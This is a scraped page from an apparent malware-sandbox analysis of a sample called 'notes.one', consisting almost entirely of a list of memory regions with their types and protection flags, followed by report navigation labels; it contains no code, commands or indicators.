1D651D3D000

heap

page read and write

2DE0000

heap

page read and write

1F017E000

stack

page read and write

46BB000

heap

page read and write

2A2F000

stack

page read and write

2E60000

heap

page read and write

2BDF000

stack

page read and write

1A0DD97C000

heap

page read and write

3A8E000

stack

page read and write

29E0000

heap

page read and write

964000

heap

page read and write

1D653A75000

trusted library allocation

page read and write

1A0DD976000

heap

page read and write

46BB000

heap

page read and write

46BB000

heap

page read and write

F60000

heap

page read and write

10000000

direct allocation

page read and write

46BB000

heap

page read and write

9DD000

stack

page read and write

1D651CD8000

heap

page read and write

1D653860000

trusted library allocation

page read and write

46BB000

heap

page read and write

46BB000

heap

page read and write

7BAA27F000

stack

page read and write

254D000

stack

page read and write

1D653B3D000

trusted library allocation

page read and write

7FF8010B0000

trusted library allocation

page read and write

1A0DE059000

heap

page read and write

1A0DD970000

heap

page read and write

1A0DD937000

heap

page read and write

1D653E98000

trusted library allocation

page read and write

7BA9E7D000

stack

page read and write

294E000

stack

page read and write

4F54000

heap

page read and write

2BA0000

heap

page read and write

1F02BF000

stack

page read and write

2B9D000

stack

page read and write

2A68000

heap

page read and write

1A0DD932000

heap

page read and write

46BB000

heap

page read and write

1A0DCEA1000

heap

page read and write

E10000

heap

page read and write

1A0DCEE8000

heap

page read and write

519C000

heap

page read and write

193C5535000

heap

page read and write

29E5000

heap

page read and write

7FF801020000

trusted library allocation

page execute and read and write

CFA000

heap

page read and write

330E000

stack

page read and write

7FF800FF0000

trusted library allocation

page execute and read and write

2E5E000

stack

page read and write

1D651D84000

heap

page read and write

1D651D4E000

heap

page read and write

964000

heap

page read and write

46BB000

heap

page read and write

1A0DCEE0000

heap

page read and write

3470000

heap

page read and write

5720000

heap

page read and write

CF0000

heap

page read and write

298F000

stack

page read and write

46BB000

heap

page read and write

4832000

heap

page read and write

3B4F000

stack

page read and write

2B1E000

stack

page read and write

47D0000

direct allocation

page execute and read and write

2CDE000

stack

page read and write

6E0000

unclassified section

page readonly

CA0000

unclassified section

page readonly

2BE0000

unclassified section

page readonly

1A0DD92D000

heap

page read and write

B34000

heap

page read and write

70D000

stack

page read and write

1A0DD951000

heap

page read and write

3CD000

stack

page read and write

30EE000

stack

page read and write

1D651D19000

heap

page read and write

3020000

heap

page read and write

1A0DCE8F000

heap

page read and write

46BB000

heap

page read and write

1D6539A0000

trusted library allocation

page read and write

46BD000

heap

page read and write

1D653A03000

trusted library allocation

page read and write

1D653FDA000

trusted library allocation

page read and write

1A0DD929000

heap

page read and write

1A0DD97F000

heap

page read and write

4698000

heap

page read and write

287D000

stack

page read and write

1D6539A0000

trusted library allocation

page read and write

2A3D000

stack

page read and write

2F10000

unclassified section

page readonly

1D653F04000

trusted library allocation

page read and write

1D653AF9000

trusted library allocation

page read and write

2A5E000

stack

page read and write

519C000

heap

page read and write

1A0DD913000

heap

page read and write

2B20000

heap

page read and write

2E1E000

stack

page read and write

7FF800EF0000

trusted library allocation

page execute and read and write

8CB000

stack

page read and write

680000

unclassified section

page readonly

9E0000

heap

page read and write

1A0DE013000

heap

page read and write

1A0DCF1A000

heap

page read and write

31EE000

stack

page read and write

321E000

stack

page read and write

1D653860000

trusted library allocation

page read and write

4A80000

heap

page read and write

1D6539E1000

trusted library allocation

page read and write

34A8000

heap

page read and write

1D663A4D000

trusted library allocation

page read and write

1A0DD97C000

heap

page read and write

4C71000

heap

page read and write

1A0DD92E000

heap

page read and write

46BB000

heap

page read and write

1D653BBE000

trusted library allocation

page read and write

1A0DD815000

heap

page read and write

2790000

unclassified section

page readonly

1F093D000

stack

page read and write

338F000

stack

page read and write

7FF8010C0000

trusted library allocation

page read and write

6938D000

unkown

page readonly

31AE000

stack

page read and write

1001A000

direct allocation

page readonly

1001F000

direct allocation

page read and write

1D651D2E000

heap

page read and write

1F007D000

stack

page read and write

2D40000

heap

page read and write

33EE000

unkown

page read and write

361E000

stack

page read and write

2BF5000

heap

page read and write

46BB000

heap

page read and write

850000

unclassified section

page readonly

46BB000

heap

page read and write

46BB000

heap

page read and write

1A0DCE9C000

heap

page read and write

693AB000

unkown

page readonly

346F000

stack

page read and write

27A0000

heap

page read and write

1D651D86000

heap

page read and write

2F60000

heap

page read and write

1D651D48000

heap

page read and write

2E5D000

stack

page read and write

1D651D44000

heap

page read and write

1D66BDFB000

heap

page read and write

2CE0000

heap

page read and write

1D6639F0000

trusted library allocation

page read and write

7FF800EEC000

trusted library allocation

page execute and read and write

1A0DE0AD000

heap

page read and write

1A0DD970000

heap

page read and write

3560000

heap

page read and write

2C7E000

stack

page read and write

3ACF000

stack

page read and write

1D651D17000

heap

page read and write

193C5220000

heap

page read and write

193C5530000

heap

page read and write

682C000

heap

page read and write

1D66C032000

heap

page read and write

51A8000

heap

page read and write

4FDC000

heap

page read and write

46BB000

heap

page read and write

1A0DD976000

heap

page read and write

329E000

stack

page read and write

5E51000

heap

page read and write

2D20000

heap

page read and write

1D651D6D000

heap

page read and write

2A9E000

stack

page read and write

2DDE000

stack

page read and write

46CD000

heap

page read and write

90C000

stack

page read and write

1D66BE1E000

heap

page read and write

3445000

heap

page read and write

4A40000

heap

page read and write

193C5290000

heap

page read and write

46D6000

heap

page read and write

1D651B20000

heap

page read and write

1D653770000

heap

page execute and read and write

2B60000

heap

page read and write

519C000

heap

page read and write

4674000

heap

page read and write

5130000

trusted library allocation

page read and write

1A0DCED9000

heap

page read and write

29E0000

heap

page read and write

90F118F000

stack

page read and write

35E0000

heap

page read and write

C5E000

unkown

page read and write

46BD000

heap

page read and write

25CE000

stack

page read and write

7FF801090000

trusted library allocation

page read and write

9C0000

heap

page read and write

1D66BF90000

heap

page execute and read and write

1A0DCEF1000

heap

page read and write

4651000

heap

page read and write

46BB000

heap

page read and write

1D653850000

trusted library allocation

page read and write

3481000

heap

page read and write

1F08BE000

stack

page read and write

69374000

unkown

page readonly

1D653860000

trusted library allocation

page read and write

1A0DE000000

heap

page read and write

6CE000

stack

page read and write

E0F000

heap

page read and write

4674000

heap

page read and write

2C9E000

stack

page read and write

51A8000

heap

page read and write

1A0DE034000

heap

page read and write

46BB000

heap

page read and write

1D651D7A000

heap

page read and write

1F073D000

stack

page read and write

1A0DE00E000

heap

page read and write

29CE000

stack

page read and write

1A0DCE95000

heap

page read and write

290F000

stack

page read and write

7FF801050000

trusted library allocation

page read and write

3000000

heap

page read and write

7BA978E000

stack

page read and write

7FF801070000

trusted library allocation

page read and write

46BB000

heap

page read and write

1A0DD929000

heap

page read and write

312E000

stack

page read and write

46D6000

heap

page read and write

4820000

heap

page read and write

46CD000

heap

page read and write

1D653780000

trusted library allocation

page read and write

1F00FF000

stack

page read and write

1A0DD680000

trusted library allocation

page read and write

193C529B000

heap

page read and write

7BAA37E000

stack

page read and write

46BB000

heap

page read and write

90F110E000

stack

page read and write

1D653A4D000

trusted library allocation

page read and write

1D653AF6000

trusted library allocation

page read and write

1D653EC4000

trusted library allocation

page read and write

51A8000

heap

page read and write

46BB000

heap

page read and write

7BA9F7F000

stack

page read and write

1A0DD800000

heap

page read and write

1A0DE065000

heap

page read and write

1D66BE0C000

heap

page read and write

2E20000

heap

page read and write

1EFEFE000

stack

page read and write

1A0DE099000

heap

page read and write

46BB000

heap

page read and write

2A60000

heap

page read and write

7FF8010F0000

trusted library allocation

page read and write

7CE000

stack

page read and write

46D9000

heap

page read and write

7FF801110000

trusted library allocation

page read and write

1A0DD740000

remote allocation

page read and write

298F000

stack

page read and write

32C0000

heap

page read and write

350000

unclassified section

page readonly

46BB000

heap

page read and write

1A0DD980000

heap

page read and write

7FF801012000

trusted library allocation

page read and write

1A0DCEAD000

heap

page read and write

2BE0000

heap

page read and write

1D651E80000

heap

page read and write

1D66BE1E000

heap

page read and write

63D000

stack

page read and write

1A0DE082000

heap

page read and write

2BF0000

heap

page read and write

1A0DD950000

heap

page read and write

1A0DE008000

heap

page read and write

1F06B7000

stack

page read and write

2A48000

heap

page read and write

7FF8010D0000

trusted library allocation

page read and write

46BB000

heap

page read and write

1A0DCE91000

heap

page read and write

2A70000

heap

page read and write

46BB000

heap

page read and write

1EFFFE000

stack

page read and write

69390000

unkown

page write copy

3440000

heap

page read and write

1D653A3A000

trusted library allocation

page read and write

46BB000

heap

page read and write

2C10000

heap

page read and write

A3C000

stack

page read and write

46BB000

heap

page read and write

1A0DCD00000

heap

page read and write

308F000

unkown

page read and write

2B9E000

stack

page read and write

46BB000

heap

page read and write

4674000

heap

page read and write

46BB000

heap

page read and write

46BB000

heap

page read and write

33A0000

heap

page read and write

303E000

stack

page read and write

1A0DCE40000

heap

page read and write

69373000

unkown

page read and write

1D66BE05000

heap

page read and write

46BB000

heap

page read and write

46BB000

heap

page read and write

7FF801060000

trusted library allocation

page read and write

46D9000

heap

page read and write

6938E000

unkown

page read and write

1A0DCED7000

heap

page read and write

2F7E000

stack

page read and write

2F65000

heap

page read and write

7FF800E32000

trusted library allocation

page read and write

46BB000

heap

page read and write

3477000

heap

page read and write

46BB000

heap

page read and write

1D66C310000

heap

page read and write

67D000

stack

page read and write

46BB000

heap

page read and write

6937C000

unkown

page readonly

1D653BCB000

trusted library allocation

page read and write

964000

heap

page read and write

1A0DCEBF000

heap

page read and write

5130000

trusted library allocation

page read and write

7BA9A7E000

stack

page read and write

1D66C02B000

heap

page read and write

1A0DD97C000

heap

page read and write

1A0DE045000

heap

page read and write

7FF801080000

trusted library allocation

page read and write

7FF8010E0000

trusted library allocation

page read and write

9B0000

unclassified section

page readonly

1A0DCED2000

heap

page read and write

2CC0000

heap

page read and write

1D6539D0000

heap

page execute and read and write

1D651C97000

heap

page read and write

336E000

unkown

page read and write

5130000

trusted library allocation

page read and write

1D653860000

trusted library allocation

page read and write

46D9000

heap

page read and write

1D651D6A000

heap

page read and write

E00000

heap

page read and write

1A0DCE9F000

heap

page read and write

1A0DCF3B000

heap

page read and write

1A0DD974000

heap

page read and write

46BB000

heap

page read and write

46BB000

heap

page read and write

30B0000

heap

page read and write

7FF801030000

trusted library allocation

page read and write

1A0DCE13000

heap

page read and write

7D0000

heap

page read and write

46BB000

heap

page read and write

7FF800F50000

trusted library allocation

page execute and read and write

1D653BCE000

trusted library allocation

page read and write

1D653FD1000

trusted library allocation

page read and write

46BB000

heap

page read and write

7BA9BF9000

stack

page read and write

2B1A000

heap

page read and write

3140000

heap

page read and write

1D653853000

trusted library allocation

page read and write

1D651E00000

heap

page read and write

1A0DD97C000

heap

page read and write

1A0DD981000

heap

page read and write

1D651D8D000

heap

page read and write

1A0DD90E000

heap

page read and write

1D653B0D000

trusted library allocation

page read and write

1D66BD20000

heap

page read and write

1A0DE01A000

heap

page read and write

2FEC000

heap

page read and write

1A0DD974000

heap

page read and write

5130000

trusted library allocation

page read and write

33CE000

stack

page read and write

1D653990000

trusted library allocation

page read and write

1D651CEE000

heap

page read and write

2A30000

heap

page read and write

1A0DD970000

heap

page read and write

469C000

heap

page read and write

1A0DD95A000

heap

page read and write

46BD000

heap

page read and write

46D9000

heap

page read and write

1A0DCE2A000

heap

page read and write

2FBF000

stack

page read and write

B34000

heap

page read and write

7FF800E34000

trusted library allocation

page read and write

1D653BDA000

trusted library allocation

page read and write

46BB000

heap

page read and write

960000

unclassified section

page readonly

4C71000

heap

page read and write

C10000

unclassified section

page readonly

46BB000

heap

page read and write

E0F000

heap

page read and write

7C0000

unclassified section

page readonly

25AD000

stack

page read and write

970000

heap

page read and write

1D651D31000

heap

page read and write

7D8000

heap

page read and write

1A0DCEEE000

heap

page read and write

336E000

stack

page read and write

24A0000

heap

page read and write

1D66BDEF000

heap

page read and write

29B0000

heap

page read and write

1D653777000

heap

page execute and read and write

7FF8010A0000

trusted library allocation

page read and write

1A0DCE99000

heap

page read and write

29CE000

stack

page read and write

964000

heap

page read and write

46BB000

heap

page read and write

2BBF000

stack

page read and write

970000

heap

page read and write

2A3E000

stack

page read and write

1A0DD956000

heap

page read and write

1EFE7E000

stack

page read and write

46BB000

heap

page read and write

964000

heap

page read and write

1D66C000000

heap

page read and write

7BA9AFE000

stack

page read and write

1D651D1C000

heap

page read and write

1D651D50000

heap

page read and write

964000

heap

page read and write

1D653E4B000

trusted library allocation

page read and write

46BB000

heap

page read and write

7FF801100000

trusted library allocation

page read and write

2540000

heap

page read and write

1D651CC8000

heap

page read and write

30DD000

stack

page read and write

1F09BD000

stack

page read and write

3481000

heap

page read and write

2DD0000

unclassified section

page readonly

46BB000

heap

page read and write

964000

heap

page read and write

1A0DD802000

heap

page read and write

2E70000

heap

page read and write

1A0DD970000

heap

page read and write

46D9000

heap

page read and write

5130000

trusted library allocation

page read and write

E10000

heap

page read and write

D9E000

stack

page read and write

1A0DD900000

heap

page read and write

69340000

unkown

page readonly

575E000

heap

page read and write

7FF801000000

trusted library allocation

page execute and read and write

2A7D000

stack

page read and write

FCD000

stack

page read and write

1D66C017000

heap

page read and write

35DD000

stack

page read and write

1F063C000

stack

page read and write

1A0DCE7C000

heap

page read and write

960000

heap

page read and write

46BB000

heap

page read and write

1D653AFC000

trusted library allocation

page read and write

1A0DD92C000

heap

page read and write

3B0000

unclassified section

page readonly

46BB000

heap

page read and write

2B7B000

heap

page read and write

1A0DD740000

remote allocation

page read and write

E0F000

heap

page read and write

7BAA179000

stack

page read and write

1A0DD976000

heap

page read and write

1A0DD92C000

heap

page read and write

D5F000

stack

page read and write

2BF0000

heap

page read and write

35E5000

heap

page read and write

46BB000

heap

page read and write

1D651F20000

heap

page read and write

1A0DD93B000

heap

page read and write

31F0000

heap

page read and write

3250000

unclassified section

page readonly

46BB000

heap

page read and write

4671000

heap

page read and write

1A0DD97A000

heap

page read and write

1D6536E0000

trusted library allocation

page read and write

7FF800E40000

trusted library allocation

page read and write

3C0000

heap

page read and write

2C3E000

stack

page read and write

1D651D57000

heap

page read and write

1A0DD90E000

heap

page read and write

7FF800FE4000

trusted library allocation

page read and write

2D45000

heap

page read and write

1D653ECA000

trusted library allocation

page read and write

1F0336000

stack

page read and write

2A80000

unclassified section

page readonly

1A0DD996000

heap

page read and write

E05000

heap

page read and write

1F01FE000

stack

page read and write

964000

heap

page read and write

2F80000

heap

page read and write

1D653875000

heap

page read and write

CEE000

stack

page read and write

46BB000

heap

page read and write

1D651CF1000

heap

page read and write

1A0DCDB0000

unclassified section

page readonly

34A0000

heap

page read and write

33E0000

heap

page read and write

46BB000

heap

page read and write

46BB000

heap

page read and write

7FF800FE1000

trusted library allocation

page read and write

46BB000

heap

page read and write

2B5F000

stack

page read and write

7BAA07C000

stack

page read and write

7FF800EE0000

trusted library allocation

page read and write

2FFE000

stack

page read and write

298E000

stack

page read and write

2B1E000

stack

page read and write

1D6639E1000

trusted library allocation

page read and write

46DE000

heap

page read and write

4A81000

heap

page read and write

46BB000

heap

page read and write

1A0DD97B000

heap

page read and write

46BB000

heap

page read and write

1D651D41000

heap

page read and write

1D651C90000

heap

page read and write

46BB000

heap

page read and write

10001000

direct allocation

page execute read

E0F000

heap

page read and write

1A0DD92B000

heap

page read and write

33E8000

heap

page read and write

4A1F000

heap

page read and write

2B10000

heap

page read and write

2BE5000

heap

page read and write

7FF801040000

trusted library allocation

page read and write

1A0DCE5D000

heap

page read and write

1D653EC6000

trusted library allocation

page read and write

682A000

heap

page read and write

2C1E000

stack

page read and write

306E000

stack

page read and write

4701000

heap

page read and write

46BB000

heap

page read and write

8DD000

stack

page read and write

46DE000

heap

page read and write

193C50E0000

heap

page read and write

1D651D61000

heap

page read and write

2C5D000

stack

page read and write

1D66BDFD000

heap

page read and write

1A0DCEAF000

heap

page read and write

1D651D1D000

heap

page read and write

1D653AFF000

trusted library allocation

page read and write

1A0DCDC0000

heap

page read and write

323D000

stack

page read and write

1A0DD992000

heap

page read and write

1A0DE057000

heap

page read and write

F1E000

stack

page read and write

7FF801150000

trusted library allocation

page read and write

46CD000

heap

page read and write

1D651D42000

heap

page read and write

1D66C01A000

heap

page read and write

1A0DD929000

heap

page read and write

46BB000

heap

page read and write

7DF4287C0000

trusted library allocation

page execute and read and write

5F1E000

heap

page read and write

2E1E000

stack

page read and write

46BB000

heap

page read and write

7FF800E4C000

trusted library allocation

page read and write

1A0DD962000

heap

page read and write

7FF800E3D000

trusted library allocation

page execute and read and write

C7D000

stack

page read and write

49A0000

heap

page read and write

1EFF7E000

stack

page read and write

3620000

heap

page read and write

34C5000

heap

page read and write

2EDE000

stack

page read and write

1A0DD929000

heap

page read and write

F50000

unclassified section

page readonly

2E2D000

stack

page read and write

7FF801140000

trusted library allocation

page read and write

1F0A3E000

stack

page read and write

39E0000

heap

page read and write

2AD0000

unclassified section

page readonly

1A0DD974000

heap

page read and write

2BF0000

heap

page read and write

46BB000

heap

page read and write

46BB000

heap

page read and write

31F8000

heap

page read and write

2E75000

heap

page read and write

72E000

stack

page read and write

E10000

heap

page read and write

4661000

heap

page read and write

1F04BE000

stack

page read and write

1D651D90000

heap

page read and write

336E000

stack

page read and write

964000

heap

page read and write

1D651D27000

heap

page read and write

46BD000

heap

page read and write

1A0DD92F000

heap

page read and write

2B60000

heap

page read and write

46BB000

heap

page read and write

1D6536F0000

heap

page readonly

69341000

unkown

page execute read

46BB000

heap

page read and write

46D9000

heap

page read and write

E0F000

heap

page read and write

467C000

heap

page read and write

E10000

heap

page read and write

342E000

stack

page read and write

4BD0000

trusted library allocation

page read and write

1A0DD959000

heap

page read and write

1A0DCE8F000

heap

page read and write

1A0DCDA0000

unclassified section

page readonly

2C90000

heap

page read and write

46CD000

heap

page read and write

2ED0000

heap

page read and write

46BB000

heap

page read and write

4F30000

trusted library allocation

page read and write

1D653BD0000

trusted library allocation

page read and write

2F3E000

stack

page read and write

355F000

stack

page read and write

D12000

heap

page read and write

46BB000

heap

page read and write

3100000

unclassified section

page readonly

35A0000

heap

page read and write

7FF801130000

trusted library allocation

page read and write

3146000

heap

page read and write

1F0ABE000

stack

page read and write

46BB000

heap

page read and write

4B80000

trusted library allocation

page read and write

46BB000

heap

page read and write

10021000

direct allocation

page readonly

46BB000

heap

page read and write

193C5390000

heap

page read and write

2BA5000

heap

page read and write

1D651CB6000

heap

page read and write

There are 739 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
notes.one

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportnotes.one

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
notes.one